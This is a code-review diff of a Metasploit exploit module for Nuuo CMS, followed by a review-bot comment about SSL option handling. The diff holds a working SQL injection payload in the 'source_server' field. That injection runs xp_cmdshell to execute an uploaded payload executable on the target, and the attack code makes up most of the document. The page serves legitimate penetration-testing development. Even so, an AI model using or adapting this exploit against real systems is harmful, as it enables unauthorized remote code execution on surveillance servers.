parent
5686319271
commit
0174d1dd7e
|
@ -57,13 +57,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
def inject_sql(sql, final = false)
|
||||
sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
|
||||
if final
|
||||
nucs_send_msg_async(sql)
|
||||
else
|
||||
nucs_send_msg(sql)
|
||||
end
|
||||
def inject_sql(sql)
|
||||
res = ncs_send_request({
|
||||
'method' => 'GETOPENALARM',
|
||||
'user_session' => user_session,
|
||||
'device_id' => "#{rand_text_numeric(4)}",
|
||||
'source_server' => "';#{sql};-- ",
|
||||
'last_one' => "#{rand_text_numeric(4)}"
|
||||
})
|
||||
end
|
||||
|
||||
# Handle incoming requests from the server
|
||||
|
@ -78,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rex.sleep(3)
|
||||
|
||||
print_status('Executing shell...')
|
||||
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
|
||||
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""))
|
||||
register_file_for_cleanup("c:/windows/temp/#{@filename}")
|
||||
end
|
||||
|
||||
|
@ -112,24 +113,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
nucs_login
|
||||
|
||||
unless @nucs_session
|
||||
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
|
||||
end
|
||||
connect
|
||||
ncs_login
|
||||
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS') unless user_session
|
||||
|
||||
@pl = generate_payload_exe
|
||||
|
||||
#do not use SSL
|
||||
if datastore['SSL']
|
||||
ssl_restore = true
|
||||
ssl = datastore['SSL']
|
||||
datastore['SSL'] = false
|
||||
end
|
||||
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) {super}
|
||||
rescue Timeout::Error
|
||||
datastore['SSL'] = true if ssl_restore
|
||||
datastore['SSL'] = ssl
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
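Review bot: In `exploit`, the SSL option is restored only inside `rescue Timeout::Error`, so when `super` returns normally or raises anything else, `datastore['SSL']` stays forced to `false` for whatever runs next with the same datastore. Reading `ssl = datastore['SSL']` and `datastore['SSL'] = ssl` as the new side (the page has lost its +/- markers), the removed `if ssl_restore` guard also matters. When SSL was not enabled the `if` body never runs, `ssl` is `nil`, and the rescue then writes `nil` into the datastore instead of leaving the value untouched. Moving the restore into an `ensure` clause and guarding it, `datastore['SSL'] = ssl if ssl`, covers both cases. If the timeout is the expected way out of `super`, the `rescue Timeout::Error` can remain as an empty handler with a comment saying so.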